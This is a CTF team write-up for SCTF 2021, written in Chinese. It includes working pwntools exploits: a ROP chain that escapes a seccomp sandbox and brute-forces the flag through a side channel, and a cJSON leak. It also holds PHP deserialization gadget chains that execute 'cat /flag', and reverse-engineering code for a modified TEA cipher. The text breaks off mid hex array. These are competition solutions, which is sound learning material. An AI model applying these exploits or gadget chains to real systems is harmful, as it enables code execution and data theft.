# SCTF 2021 writeup by r4kapig 本次SCTF比赛我们获得了第7名 现将师傅们的Writeup整理如下  也欢迎师傅投简历到root@r3kapig.com,一起来加入这个大家庭 ## Pwn: ### Gadget: 沙箱 只判断了64位没判断32位 ，fstat对应32的open，可以用32位open ，64位read，然后用侧信道去爆破，这里用的sub ```python from pwn import * #context.log_level = True context.timeout=8 # if args.Q: # p=remote("121.37.135.138", 2102) # else: #p = process("./gadget") ''' 0x00000000004011c1 : mov rdi, rbx ; push r14 ; ret 0x000000000040119f : mov eax, dword ptr [rbp - 0xc] ; pop rbp ; ret 0x0000000000401000 : push rax ; pop rax ; ret 0x0000000000401191 : mov rsi, qword ptr [rbp - 0x18] ; mov edx, 0xc0 ; syscall 0x0000000000401162 : mov edi, dword ptr [rbp - 8] ; syscall ; pop rbp ; retn 0x0000000000406adb : xchg dword ptr [rdi], ecx ; ret 0x0000000000403815 : push rcx ; retf 0x0000000000403beb : mov qword ptr [rdi + rdx - 0x27], rax ; mov rax, rdi ; ret 0x000000000040a146 : cmp byte ptr [rax], ch ; jne 0x40a124 ; mov eax, 0xd4b0c388 ; jmp 0x40a124 0x0000000000408266 : cmp byte ptr [rax - 0x46], cl ; push rbp ; ret 0x5069 0x0000000000405831 : jne 0x40583c ; mov rax, rdi ; ret 0x0000000000408853 : jne 0x408852 ; ret 0x0000000000401193 : jne 0x401184 ; mov edx, 0xc0 ; syscall ''' retf_addr = 0x4011ed pop_rax = 0x401001 pop_rdi_rbp = 0x401734 pop_rsi_r15_rbp = 0x401732 syscall_addr = 0x401165 int80h_addr = 0x4011F3 bss_addr = 0x40ca00 pop_rsp_r14_r15_rbp = 0x401730 pop_rbx_r14_r15_rbp = 0x403072 pop_rcx = 0x40117b mov_rsi_r15_mov_rdx_r12_call_r14 = 0x402c04 pop_r12_r14_r15_rbp = 0x40172f pop_rbp = 0x401102 get_ecx = 0x40119f cmp_ret = 0x408266 jne_ret = 0x408853 sub_rcx_esi_jne_ret= 0x0000000000403f14 # payload = b"a" * 0x38 + p64(pop_rax) + p64(0) + p64(pop_rdi_rbp) + p64(0) + p64(bss_addr+0x10) + p64(pop_r12_r14_r15_rbp) + p64(0x300) + p64(syscall_addr) + p64(bss_addr) + p64(bss_addr+0x10) + p64(mov_rsi_r15_mov_rdx_r12_call_r14) + p64(pop_rsp_r14_r15_rbp) + p64(bss_addr+0x10) # p.send(payload) # offset=0x66+0x41 # rop = b"./flag".ljust(0x10, b"\x00") + p64(bss_addr+0x10) * 3 + p64(pop_rbx_r14_r15_rbp) + p64(bss_addr) + p64(bss_addr+0x10) * 3 + p64(pop_rcx) + p64(0) + p64(pop_rax) + p64(5) + p64(retf_addr) + p32(int80h_addr) + p32(0x23) + p32(retf_addr) + p32(pop_rdi_rbp) + p32(0x33) + p64(3) + p64(bss_addr+0x10) + p64(pop_rsi_r15_rbp) + p64(bss_addr+offset) * 3 + p64(pop_rax) + p64(0) + p64(syscall_addr) + p64(jne_ret) + p64(pop_rcx) + p64(bss_addr+offset) +p64(pop_rbx_r14_r15_rbp) +p64(bss_addr+offset-0x41)*4+ p64(sub_rcx_esi_jne_ret) +p64(0)*3+p64(0x0000000000401077) +p64(0x405837) # p.send(rop) flag="" loop=0x405837 def exp(p,num,kum): payload = b"a" * 0x38 + p64(pop_rax) + p64(0) + p64(pop_rdi_rbp) + p64(0) + p64(bss_addr+0x10) + p64(pop_r12_r14_r15_rbp) + p64(0x300) + p64(syscall_addr) + p64(bss_addr) + p64(bss_addr+0x10) + p64(mov_rsi_r15_mov_rdx_r12_call_r14) + p64(pop_rsp_r14_r15_rbp) + p64(bss_addr+0x10) p.sendline(payload) offset=num+0x41 rop = b"./flag".ljust(0x10, b"\x00") + p64(bss_addr+0x10) * 3 + p64(pop_rbx_r14_r15_rbp) + p64(bss_addr) + p64(bss_addr+0x10) * 3 + p64(pop_rcx) + p64(0) + p64(pop_rax) + p64(5) + p64(retf_addr) + p32(int80h_addr) + p32(0x23) + p32(retf_addr) + p32(pop_rdi_rbp) + p32(0x33) + p64(3) + p64(bss_addr+0x10) + p64(pop_rsi_r15_rbp) + p64(bss_addr+offset-kum) * 3 + p64(pop_rax) + p64(0) + p64(syscall_addr) + p64(jne_ret) + p64(pop_rcx) + p64(bss_addr+offset) +p64(pop_rbx_r14_r15_rbp) +p64(bss_addr+offset-0x41)*4+ p64(sub_rcx_esi_jne_ret) +p64(0)*3+p64(pop_rax)+p64(0x405614)+p64(0x0000000000401077) +p64(loop) #p64(pop_rax) + p64(0) + p64(pop_rdi_rbp) + p64(0) + p64(bss_addr+0x10) + p64(pop_r12_r14_r15_rbp) + p64(0x300) + p64(syscall_addr)+p64(bss_addr) + p64(bss_addr+0x10) + p64(mov_rsi_r15_mov_rdx_r12_call_r14) #gdb.attach(p, "b* 0x0000000000403f14") #sleep(1) p.sendline(rop) print(p.recv()) if __name__=="__main__": for i in range(5,128): print(i) for j in range(0x31,127): p=remote("121.37.135.138", 2102) try: exp(p,j,i) flag=flag+chr(j) print("flag:"+flag) p.close() continue except: p.close() continue #SCTF{woww0w_y0u_1s_g4dget_m45ter} ``` ### Dataleak: json解析时存在漏洞，通过注释符“/*”可以跳过两个字节的null，题目中变量大小为0x10，可输入0xe字节数据。  可以看到识别到“/*”时，将“*/”和空字符同等看待，使读指针后移2字节，而写指针不变，进而导致跳过2字节的空字符，使不应被解析的数据带出 ```python from pwn import * context.log_level = True #p = process("./cJSON_PWN") p = remote("124.70.202.226",2101) #gdb.attach(p, "b* $rebase(0x120d)\nb* cJSON_Minify+187") payload1 = b"/*1234*/5678/*" payload2 = b"*" * 0xc + b'/*' p.send(payload1) p.send(payload2) key = p.recv(0xb) payload1 = b"/*12345678*//*" payload2 = b"/*123*/*****/*" p.send(payload1) p.send(payload2) key += p.recv(0xb) log.info(key) p.recvuntil("input your leaked data:") p.sendline(key) p.interactive() #SCTF{cJSON_1eakdata_Never_trust_4n_escape_character} ``` ## Web: ### Loginme X-Real-IP bypass Golang template injection: {{.Password}}  ### Upload_it ```php <?php namespace Symfony\Component\String { class AbstractUnicodeString { } class UnicodeString extends AbstractUnicodeString { public $string; function __construct() { $this->string = new \Symfony\Component\String\LazyString; } } } namespace Symfony\Component\String { use Opis\Closure\SerializableClosure; class LazyString { public $value; public function __construct() { // $this->value = [new SerializableClosure,'id']; $function = function(){ eval(system('cat /flag')); }; $this->value = new \Opis\Closure\SerializableClosure($function); } } } namespace { include_once "../vendor/opis/closure/autoload.php"; $poc = new Symfony\Component\String\UnicodeString(); file_put_contents("sess_62ad0d85b6ce7ab3bc6a40c2937e4c63" , "r3kapig|".serialize($poc)); } ```   ### upload it 2 ```php <?php namespace Symfony\Component\String{ class UnicodeString{ public $string; public function __construct() { $this->string = new LazyString(); } } } namespace Symfony\Component\String{ class LazyString{ public $value; public function __construct() { $this->value = [new \sandbox(), "backdoor"]; } } } namespace { use Symfony\Component\String\UnicodeString; class sandbox{ public $evil; public function __construct() { $this->evil = "/flag"; } } echo serialize(new UnicodeString()); } ``` payload: ``` r3kapig|O:38:"Symfony\Component\String\UnicodeString":1:{s:6:"string";O:35:"Symfony\Component\String\LazyString":1:{s:5:"value";a:2:{i:0;O:7:"sandbox":1:{s:4:"evil";s:5:"/flag";}i:1;s:8:"backdoor";}}} ```  ## Reverse: ### SycOS: 文件kernel是题目系统内核文件,sctf是题目文件 指令集是risc-v 64,用Ghida可以反编译,IDA7.6能打开但是只能看汇编 先把题目的文件跑起来 编译安装qemu-system-risc-v ``` sudo apt install libpixman-1-dev git clone <https://github.com/qemu/qemu> cd qemu/ git checkout v5.0.0 ./configure --target-list=riscv64-softmmu make -j 8 sudo make install ``` 运行`./run.sh`即可运行题目的系统 系统内运行`./sctf`即可运行题目 题目输出了三行提示 ``` 1.2A 24B 7C60 173C 2.Fake Tea 3.Based on xv6 2020 labs & util branch. ``` 第三行提示说明这是一个基于xv6 2020 labs的项目 分析算法 程序运行流程是接收输入再进行两轮加密  第一轮加密是用sbrk申请两段0x1000(刚好为一个页)的内存buf1和buf2,将输入的0x40个字节通过一个算法扩展到buf1和buf2  0地址处的算法  第二轮加密流程 整体流程: 依次加密16次  魔改版tea算法,循环16次,用来加密buf2  逆运算: ```cpp void re_tea_buf2(unsigned int *data) { unsigned int sum = 0; unsigned int v0 = data[0]; unsigned int v1 = data[1]; unsigned int k0 = 0x11222233; unsigned int k1 = 0xAABBCCDD; unsigned int k2 = 0x1A2B3C4D; unsigned int k3 = 0xCC1122AA; unsigned int sums[16]; unsigned int sums_idx = 0; do { sum -= 0x61c88647; sums[sums_idx++] = sum; } while (sum != -0x1c886470); for (int i = 15; i >= 0; i--) { sum = sums[i]; //v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3); //v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1); v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3); v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1); } data[0] = v0; data[1] = v1; } void re_buf2() { for (int i = 0; i < 0x200; i++) { re_tea_buf2((unsigned int*)(dst2 + i * 8)); } } ``` 又是个魔改的tea算法,循环8次,用来加密buf1  逆运算: ```cpp void re_tea_buf1(unsigned int* data) { unsigned int v0 = data[0]; unsigned int v1 = data[1]; unsigned int k0 = 0x11222233; unsigned int k1 = 0xAABBCCDD; unsigned int k2 = 0x1A2B3C4D; unsigned int k3 = 0xCC1122AA; unsigned int sumlist[8] = { 0 }; int idx = 0; unsigned int sum = 0; do { sumlist[idx] = sum; sum = sum + -0x61c88647; idx++; } while (sum != -0xe443238); for (int i = 7; i >= 0; i--) { sum = sumlist[i]; v0 += (v1 + sum ^ v1 * 0x10 + k0 ^ (v1 >> 5) + k1); v1 += (v0 * 0x10 + k2 ^ (v0 >> 5) + k3 ^ v0 + sum); } data[0] = v0; data[1] = v1; } void re_buf1() { for (int i = 0; i < 0x200; i++) { re_tea_buf1((unsigned int*)(dst1 + i * 8)); } } ``` buf1的内容交换到buf2里面  逆运算: ```cpp void swap_data(int i){ unsigned char tmp[0x100]; int rev_i = 15 - i; memcpy(tmp, dst1 + rev_i * 0x100, 0x100); memcpy(dst1 + rev_i * 0x100, dst2 + i * 0x100, 0x100); memcpy(dst2 + i * 0x100, tmp, 0x100); } ``` 调用22号syscall函数  由于题目给的kernel文件是没有符号的,先编译一份带符号的kernel文件来定位syscall_table的位置 编译kernel 按照这个网站的说明下载编译题目系统的内核源码 Lab: Xv6 and Unix utilities(https://pdos.csail.mit.edu/6.828/2020/labs/util.html) 首先编译安装risc-v tool chain ``` sudo apt-get install libncurses5-dev sudo apt install autoconf automake autotools-dev curl libmpc-dev libmpfr-dev libgmp-dev \ gawk build-essential bison flex texinfo gperf libtool patchutils bc \ zlib1g-dev libexpat-dev git \ libglib2.0-dev libfdt-dev libpixman-1-dev \ libncurses5-dev libncursesw5-dev git clone https://gitee.com/mirrors/riscv-gnu-toolchain cd riscv-gnu-toolchain git rm qemu git submodule update --init --recursive ./configure --prefix=/opt/riscv64 sudo make newlib -j 8 sudo make linux -j 8 ``` 编译xv6-labs-2020项目 ``` git clone git://g.csail.mit.edu/xv6-labs-2020 cd xv6-labs-2020 git checkout util make TOOLPREFIX=/opt/riscv64/bin/riscv64-unknown-elf- qemu ``` 逆向syscall 拿出 `xv6-labs-2020/kernel/kernel`文件,这是带符号的内核ELF,用IDA7.6打开,定位到函数 `syscall`,往下翻找到syscalls符号  里面存放的是syscall函数的地址  往下翻发现特征字符串  通过这个字符串在题目kernel里面定位到syscall函数,再定位到syscalls符号  题目kernel中的syscalls多了个0x80006184,从上往下数它就是第22个syscall函数了 根据源码中的sys_sbrk函数得知这个指令集的syscall函数需要调用函数来拿参数  通过逆向得知这个syscall的作用是交换两个输入地址的pte  那逻辑就和交换数据一样 逆运算: ```cpp void swap_dst() { unsigned char tmp[0x1000]; memcpy(tmp, dst1, 0x1000); memcpy(dst1, dst2, 0x1000); memcpy(dst2, tmp, 0x1000); } ``` 整个求逆脚本: ```cpp #include <iostream> #include "windows.h" unsigned char dst1[] = "\x58\xC0\x98\x44\x55\x04\x41\x2C\x7E\x4B\x49\x50\xE1\x97\x57\x16\x3D\xC7\x6F\xDB\xEA\x4F\xCE\xEA\x2A\xDC\x2D\x39\x8F\x39\x92\x98\xA3\x78\x90\x69\x17\x65\x16\x8B\x4E\xC7\xB2\x12\x45\xE4\x15\xA6\x6C\xCC\x36\xDD\xE2\xFC\x47\x51\xF3\x8F\xC4\xBF\x07\x16\xD5\x17\xC9\x72\x8D\x42\xA4\x23\x18\xB1\x3A\x94\x03\x09\x75\xFD\x04\xF4\xD4\x39\x1D\xA6\xAD\xA4\x69\xDD\xC2\x38\xCF\x06\x56\xB6\x98\xB6\xE3\x67\x5C\x18\x88\x98\xC8\xCA\x46\x16\x57\x33\xDD\x5B\xA8\xFE\x23\x7A\x7C\x85\x67\xD1\x53\x53\xF2\x53\xD4\x7D\x97\x93\xB7\x7F\x49\x47\xB9\xE7\x5A\x5B\x4A\xCD\x19\xB9\xB3\x53\xD5\xF6\xD7\xB0\x47\xCD\xBA\x5A\x7E\x9D\x27\x72\x9D\x78\xD3\x1D\xB0\xA7\x28\x45\xD9\x6D\xE0\xEA\xC6\x66\x9A\x07\x9A\xB7\x09\x18\xBD\x3E\xD0\x35\x64\xA4\xC2\x26\x9D\x34\xFE\x85\x4C\x01\xA6\xF3\x02\x4A\xD5\x6C\x83\xD1\xC7\x4E\xE8\xC5\xC2\x27\xAD\x70\x0F\x26\x7F\xB9\x9B\xCB\x76\xA9\x7E\xCA\x64\x5C\x31\x56\xB7\xFE\xB8\xCE\xAC\xB0\x3F\xCA\x4B\x9A\x8E\x85\x4E\x36\x87\x5A\x74\xE5\x7D\x73\x1F\xD1\xFD\x26\xC0\xB2\xE6\xB1\xFA\x06\x95\x4E\xC9\xEC\x50\xFE\x1A\x13\xE4\x6F\x69\x48\xA4\xCD\xED\xAB\xAD\xEA\x2E\x05\x92\x7C\xBE\xBE\xB0\xE7\xBE\x7F\x53\xA4\x1D\xEF\x4A\x4F\xC1\xFE\x86\xD9\x20\x4A\x28\x2D\xE5\x15\x80\x43\x3E\x8F\x03\x2F\xB5\x75\x1D\x7E\x78\x92\x12\x2E\xAB\x47\x6A\xA0\xF7\x0C\x49\x85\xFD\x0A\x6B\x7D\x85\x4E\x5B\xD4\x07\xCC\x3C\xCF\x7D\x6C\xEF\xF7\xDE\x78\x54\x41\x0C\x9E\x56\xC4\x7B\xD7\x9D\xC1\xFF\x4D\x28\x78\x96\xC0\x78\x48\xF7\xA4\xFE\xEE\x96\xEE\x16\xAB\x31\x85\xE4\x4F\xBA\xB8\xFE\x8B\xF5\x99\xA4\xB5\xE2\x8F\xE5\xF8\x9B\xC2\xBA\x75\xC0\x39\x04\xD1\x0D\xCC\x69\x2F\x4D\xB1\x2A\x3F\x1E\x09\xE6\x1E\xF7\x63\xDF\x1C\xBB\xD4\x23\x17\xF0\x3D\xED\xA5\xCD\x74\x5F\x10\xDE\x94\xA2\x9E\x3D\x99\xA6\xBB\x08\xCD\x59\x7A\x2A\x67\xBE\xB5\xA8\x1C\x2C\x18\xDA\xD9\x29\x22\x83\xCD\x77\xBD\xAC\xF1\x65\x87\x45\xBF\x75\x95\xE6\x61\xCF\x47\xB4\xBE\x94\x62\x6C\x87\x7B\xC3\x9A\x55\x54\x44\xD8\xFE\x28\xB9\x05\xB3\xED\xF6\x14\x54\xEC\x26\x1E\xB2\xAC\xE3\x44\x41\x87\xC0\x2E\x7A\xAA\x5E\x3A\xB3\xA9\x43\xA7\x31\x1F\x2B\x03\x36\x91\x87\x49\x93\x6F\x1F\xB6\x84\x2E\x33\xB9\x82\x65\x75\xC9\x5B\x40\x65\x6F\x52\x48\x5B\xBC\x2A\xB5\xEC\x98\x37\xEA\x9C\x79\x70\x4A\xBF\x49\x36\xB2\x45\xCD\x38\xD0\xFE\xCE\x99\xAC\xBD\x33\x1D\x1E\x02\xAD\xB2\xD3\xA6\x81\xED\x07\x35\xB5\xD8\x04\x42\x39\xB4\xFC\xF4\x85\xE0\x66\x53\x4F\x2F\x0B\x17\x58\x14\xED\x6A\xA5\xB5\x0E\x13\x6C\x35\x98\x8D\x25\x48\x60\x7C\xD3\xEB\x94\x2A\x5C\xAD\x49\x86\x92\xD7\xA0\xD0\xF3\x8C\x75\x9F\xD3\xC6\x74\xDE\x54\x4C\x71\xE3\x40\x0C\x4E\xFC\x0A\xB8\xD9\x12\x29\x0B\xDC\x74\x62\x44\x89\xE8\x99\x29\x66\x62\x77\xD6\x2D\xBE\xCF\x25\xF8\xF2\x4A\x2D\x73\x94\xA6\x3A\xA5\xF2\x05\x43\x86\x04\x98\x4B\x48\x2D\x80\xF7\x84\x6B\x6F\xC9\x1C\x93\x46\x01\x83\xBE\x68\x61\xB8\xCF\xA4\x2B\xA6\xF3\xBC\x7B\xA8\x29\x9F\x47\xA5\xF7\xD6\x3E\x6C\x37\x06\x88\xEC\xD1\x74\xC9\xA1\x1E\xD1\x99\x77\xB7\x95\x86\x52\xF2\xFC\x88\x24\x49\x51\x9D\xC1\x24\xB9\x96\x70\x3B\x9C\xAD\xEB\xAE\x62\xAE\x13\x55\x23\xB8\x75\x2B\x58\xDB\xE7\x24\xF5\xFF\x57\xBA\x5F\x45\xE5\xF9\xCF\xD0\x5F\xC2\x12\x60\x6A\x5D\xC8\x23\x20\x5E\x38\x0B\x05\xFA\x9C\x7D\xA8\x8C\x15\xC2\xC4\x2F\xDD\xED\x22\x97\x88\x43\xEE\xCE\xFC\x69\x15\x2D\xFE\x75\xD3\x9A\x6F\x60\xE8\x4B\x20\xEB\x53\x7D\x41\x31\x7B\xF8\x5B\x6C\xC8\x82\xFD\xC4\x9E\xB2\xAC\xAE\x00\xF1\xB7\x40\x7D\xBD\xFE\xA3\xB2\x16\x51\xAE\xA5\x50\x6B\xB4\x1D\xB8\x41\xFC\x27\x8D\xD5\x73\xA5\x86\xA5\x43\x3F\x4F\x35\xCE\x54\xE0\xA2\xCD\xA1\x93\x8A\xA4\xC6\x2F\xD9\xF9\x2D\xA2\xA2\x7A\x41\x90\x41\xD3\xD6\xF3\x0C\x52\x40\x39\x5B\x79\xA3\xA1\xA6\xF8\xF1\xA7\xF0\x04\x47\x6B\x22\x9E\x47\x78\x63\x84\x42\xC5\x7D\x9F\xE1\xE2\x32\x93\x9F\xFA\x2C\x61\xBE\x7B\xFE\x83\xB5\xBF\x9B\xEC\x52\xAE\x03\xBD\xA0\x13\x77\xBE\x8C\x4A\x4C\xE1\x1B\x0C\x9E\x76\x9E\x4B\x95\x74\x82\xC2\x7E\x09\xA2\x23\xA4\x94\x12\x92\x3E\xFD\x98\xDC\xF2\x6F\x27\xE7\xC8\xCB\x55\x67\x6F\x9D\x44\x5F\x03\x89\x05\x3F\x70\xF1\x9C\xD9\x0C\x3F\x91\xF6\x98\x20\xAD\x96\x6D\x18\xFA\xE1\x58\x0D\x6C\x55\x9A\xF9\x14\x14\x60\x2C\x8B\x72\xD2\x8A\x57\x95\x02\x01\x8D\x4C\x9F\x86\x08\xE6\x4A\xE9\xF1\x93\xFF\xAF\xC8\xD0\x64\xA9\x2B\xD9\xBB\xFB\x71\x16\x5B\x62\x12\x8D\x7D\xC2\x6C\x85\x39\xA9\xDE\xD8\xF9\x87\x4A\xB9\xF1\x6A\xDF\xC0\x0D\x39\x96\x00\x8C\x12\xFD\x1F\xE0\xFE\xFE\x2A\xB1\x6B\x02\x0F\xAF\x11\x38\x36\x04\xBE\x43\xEE\xD5\xFB\xB9\x17\x3A\x5E\xEF\x22\x0F\x5B\x7E\xB0\x5E\x17\x69\x3C\xE1\x63\x2E\x20\x61\x54\x61\x4C\x24\x9F\x9D\x5D\xE3\x35\x1D\x66\x41\xE1\x8C\xEF\xD4\xFD\x3E\x6C\xA3\x1D\xF9\x5A\x52\x72\x4B\x89\x7D\x1F\xC6\xFB\x66\xFD\x26\x46\x64\x37\x6F\xCE\x23\x0A\x21\x18\xDA\x38\x9C\x99\x58\x8D\xB3\x23\x1D\xB4\x00\x74\x9A\x24\x83\x94\xE9\x75\x3C\xC0\x38\x83\xBB\x97\x42\xA1\x98\x71\xE9\x6E\xE0\x70\xC0\xB1\x55\xDE\xBC\x17\xCA\x78\x5A\x4C\x94\xBB\x52\x6A\xC1\x6B\x8C\xD4\xA6\x87\x52\xA8\x05\xC7\xCB\x83\x97\x30\x5D\xAF\xC6\x50\xA8\x2A\xEE\xFB\xB5\x5B\xA7\x5E\xEF\x1E\x34\xCF\x8C\x62\x30\xFD\xB2\x3F\x44\x0B\xFF\x42\xAA\x6E\x47\x60\x9C\x9F\xF3\x08\x27\x02\xF3\x29\x53\x83\x7B\x1C\x3E\xB4\x95\x4B\x70\xE4\x99\x3B\xFE\x3E\xF0\x89\x7A\xD2\xB1\xAA\x64\x3D\xF7\xB2\xCE\x4F\x91\x1B\xAE\x6D\xC8\x7D\xD5\x64\xED\xAE\x6F\xD5\x23\x7D\x2A\x7A\x26\xB5\x73\x05\x6E\x9A\x26\x7F\x45\xE2\xA8\xAE\x1F\x1F\x6D\x9D\x40\xFD\x2E\x81\x59\xA7\x80\x69\xA7\x49\xCA\x9C\x1F\x32\x2E\x48\x15\x69\x69\x5A\x54\x4E\xF0\xD7\xB7\xFF\xB9\x5B\x69\x47\xF0\xD3\xDE\x1D\xF3\x4E\x45\x23\x24\xD2\x93\x29\x83\x56\x61\x4F\x88\x46\xF0\x7A\xB6\x2D\xE5\x1D\x4B\x73\xEF\xE5\x1A\xB3\x96\xD9\xAC\xAC\xC1\xDF\x64\x1E\x06\x4F\x66\x48\x81\x68\xE5\xF3\xE0\x6B\xB7\xCB\x9A\x59\xCC\x70\xEB\xCC\x07\x1D\xA9\x23\xCF\x1A\x5D\x71\x57\x0C\x67\xF4\xE0\xA5\x26\x30\x04\x7A\x0A\xE8\xF9\x52\x3E\x6B\x04\x8C\x11\xB7\x28\x56\xE6\xF9\xC5\x5B\xFE\x86\xD8\x35\xC7\x16\x70\xBC\x32\xEA\xA5\xBE\x0C\x59\x9B\x9C\x57\x7B\xDE\x3D\x6E\x65\xD2\xE3\xAA\x29\xFA\x57\xFB\xB7\x94\x50\xD3\x92\xB2\x41\x9E\xD2\x6A\xBB\x7A\x28\xAC\xD5\x6F\xF8\x0B\x8A\xEC\x4E\x15\x30\x53\x39\xB4\x64\xEC\x30\x64\x4D\x39\x89\xE3\x38\xB1\x3F\x8C\xFA\x34\x4B\xCC\xCB\xE8\xEF\x0F\xAF\x32\x03\x9F\x41\x22\x2D\x05\xBD\x4F\xDB\xAB\x3B\x98\x86\x47\xA7\xE9\x12\x45\x87\xED\x63\x86\xF2\x74\x08\xD8\x20\x10\x99\x57\x93\x71\xBA\xF2\x65\x5F\x88\x29\xBE\x4C\x0F\xCD\x1B\x10\xB0\x3F\x4A\xED\x69\x0C\x8C\x43\x81\xDB\x20\x6F\x29\x65\x8C\x34\xA2\xBE\xB4\x96\x75\xD7\xC8\xAA\x89\x40\x38\xBB\xB8\xEE\x41\x1A\x2B\xC6\xC5\xD0\x99\x41\x73\x82\x1F\xFB\x41\x52\xF4\x84\x1C\x31\x3D\x9B\x5A\xFB\xB6\x95\x07\x67\x32\x9F\x95\x12\xC6\x86\x20\x1B\x6C\x5D\x3D\x18\xCF\x99\xB5\x7C\x45\x60\x59\xBB\xFD\x20\xD3\x82\xA6\x92\x56\x06\x56\x64\x51\x87\x92\x46\x7B\x6C\xB0\x79\x12\xA1\x3E\x69\x8F\x2F\xA4\xCE\x24\x4F\x89\x11\x11\xA3\x50\x80\xA3\xF0\xCB\xAA\xB5\x59\x04\x77\x52\xF5\x3A\x18\xB0\x05\x24\x67\xE6\xBB\xD3\x62\xC4\xBB\x5C\x60\x5E\xD9\xFE\xFA\x66\x35\x02\x9B\x55\xA2\x27\xE2\xCB\x0B\xB8\x43\x2D\xB0\xD1\x11\x42\x10\x07\x67\x7D\x6B\x11\xC3\xE2\x37\xFF\x0A\x64\xF9\x2A\x61\xE2\xD6\x38\x5A\x91\xC3\x18\x75\xE9\xE8\xDA\x4C\xEA\x1A\x3B\xDB\x04\xC9\x50\x45\xBD\x1C\xE6\x0F\x01\xFA\x3E\xFC\x85\x52\x88\x3F\xFC\x56\x78\xF8\x35\xBC\x72\x09\x1F\x58\xFF\x86\xEE\x4E\xB7\x9C\xC8\xC0\x69\x18\xEF\x62\xBF\xF7\x19\x69\xF8\x11\x62\xDD\xC5\x59\xBA\xF2\x37\x6A\x25\x21\x96\x4E\x4B\xDC\xBA\x2C\xFD\x6E\x1C\x55\x9E\x0A\x34\x68\xE6\x2B\x10\x1C\x2D\x9E\x39\xF4\x6B\x44\x60\x9B\x2D\xA0\xC9\x19\x9C\x7A\x28\x19\x2A\xDD\x58\x49\xD6\x52\xF8\x83\x3A\x36\xEA\xEF\x35\xA2\xEB\xDB\xB5\x1C\x86\xC8\x34\xBC\xA4\x57\xE9\x75\x0A\x8D\x2F\x9F\x53\x90\xC1\x6F\xB1\x97\x83\x8A\x28\x5A\x1F\x71\x59\x46\x2F\xCA\x29\x23\xA3\x5F\x26\x46\x63\x07\xFE\x70\x9A\x54\xA2\x9E\x36\xAC\xEA\xFD\xAA\xAE\xB9\x9E\xC4\xD3\xAF\x99\x20\x85\x00\xA3\x11\xAA\x25\x02\x8C\x76\xAF\x82\x88\xEA\x00\x10\x9A\x48\x73\xCC\xB9\xBE\x73\xB9\xF2\x6D\x72\xE5\x85\x80\xBE\x8B\x28\x57\x76\x30\x34\x48\x30\x0E\x94\x7F\x8E\x06\x37\x00\xB4\x5F\xD9\xA7\xCA\x31\x8D\xE2\x42\xA6\x9C\x05\x8B\xB8\x10\x2A\xBC\x22\xA0\x1A\x56\x76\xA2\xAD\xB7\x3F\x3B\xEA\xB8\x50\xE7\x95\xF5\x15\x76\xC0\x35\x48\x0B\xF3\xED\xE4\x45\x4A\x2C\x88\x3A\x02\x4E\xDE\x53\x43\x42\xCD\x6D\x4C\xFE\x65\xDD\xDA\x13\x84\x57\xF6\xD1\xCD\x86\xDF\x96\xE2\xE1\xAB\xC1\x8E\xA0\x7B\x5C\x4E\xA9\xEE\x2C\x47\x1F\xC4\x02\x0A\xA4\xA4\x9D\xFA\x56\xCE\x0A\x9A\xCE\xB8\xD9\xFC\x32\x0A\x9C\x6E\xE6\xF8\x42\x14\x32\x90\xAC\xA6\x39\x4E\x05\xA3\xF7\xFB\x63\x16\x8B\x42\xCD\x5A\x8B\x92\xC2\xA4\x14\x21\x3C\x6C\xA2\xAE\xBF\x4C\xA8\x36\x4B\x14\xFC\x93\x3B\x3D\xAF\x95\xE4\x50\xD4\x76\xDA\x9A\xC0\xF3\xED\x80\x6C\x6A\xF0\x68\xFC\x1E\x4D\x9C\x4B\xDD\x1C\x1E\x55\x0A\xBC\x8C\xDA\xAF\x34\x5C\xB0\x3F\x78\xCC\x19\x0C\x4E\x41\xBE\x1B\x27\x33\xC2\xA5\xC4\xF6\x85\xF3\x55\x7B\xD2\xDB\xBC\xE2\x18\xB1\x06\x43\xC4\x63\x37\x30\x2A\x98\xFF\x4F\x85\xA8\x21\xA6\xA4\xA1\xDE\x56\xF4\x25\xBB\xAF\xEE\x6C\x0C\x56\x10\x4B\xD7\x72\x5C\xCA\x03\x42\x3B\xE7\xE4\x39\x82\xFF\x6D\x5A\xD0\x97\x8C\x99\x82\x32\x72\x2C\x7D\x19\x5D\xAF\x0C\x1C\xC5\x0B\xCB\xBB\x9C\x18\x91\xB7\x46\x5A\xCE\x73\xEC\xC4\x4A\xE4\x1F\xBE\x51\xA2\x45\xE2\x82\x09\x0B\x9E\x69\x1F\x2F\xED\x97\x90\xEA\x0F\x05\x37\xC9\x60\x64\x03\x6F\x62\xD7\xED\x49\xD7\xD9\x04\x84\x55\x02\x86\x62\x21\x61\xD2\xB4\x3B\xAF\x4C\x28\x69\xE3\xD8\xAC\xB6\x20\x4B\x16\x72\x32\xEB\x56\x54\xCE\x57\x4E\x67\x0D\x3E\x2A\xEE\xB6\xA7\x97\x8E\x4D\xFB\xDC\x0B\xDE\x09\xC2\x44\x15\x76\x09\x6F\x7C\x37\xAE\x3B\x22\x3A\xD7\xAE\xC5\xCA\x3C\xDE\x25\xBD\x6D\x4A\x8E\x5A\xF2\xF1\x6A\x52\xF2\xD7\xFE\xCB\x73\xBB\x37\xD5\x48\xFE\xA2\x67\x64\x7A\xB8\x82\x8E\xC4\x95\x40\x4A\x19\x15\x20\x52\x2A\x88\x4C\x03\x84\xF1\x17\x09\x6C\x69\x28\xF4\x15\xA3\x7F\x13\x95\xC7\x7F\x4D\xEE\x03\x09\x87\x72\x32\x49\xC4\x08\x52\xC5\x30\x6A\xC7\xDB\x39\xAD\xB0\x88\xBE\x02\x40\x10\x25\x10\xAF\xCC\x1B\xDD\x1E\x9D\x1C\x60\xB4\xFC\xA3\x69\x68\x45\xEC\x5D\x48\x5F\xDE\x3F\xEF\x94\x33\x2C\xB4\x4F\xA1\xB6\x5E\x2E\xC3\x9C\x47\x02\x1D\xFA\x08\xB5\x06\x63\x40\xB3\xC7\xCE\x42\x71\x26\x23\x37\x3D\x05\x8E\xC3\x99\x98\xA5\xD2\x93\x4B\x83\x7E\xF5\xB6\xD9\xE1\x3B\xA7\x6E\x86\xEB\xC0\x61\xA0\xAD\x9C\x89\x5A\x42\x3D\x58\xCD\xAF\x55\x9D\x13\x3C\x65\xB1\x23\xDB\xDB\x6E\x37\x4C\x46\x0F\x6E\xDD\x74\x85\x17\x40\x79\x81\xC5\x4D\x41\xED\x21\xE5\x5B\xE0\xF4\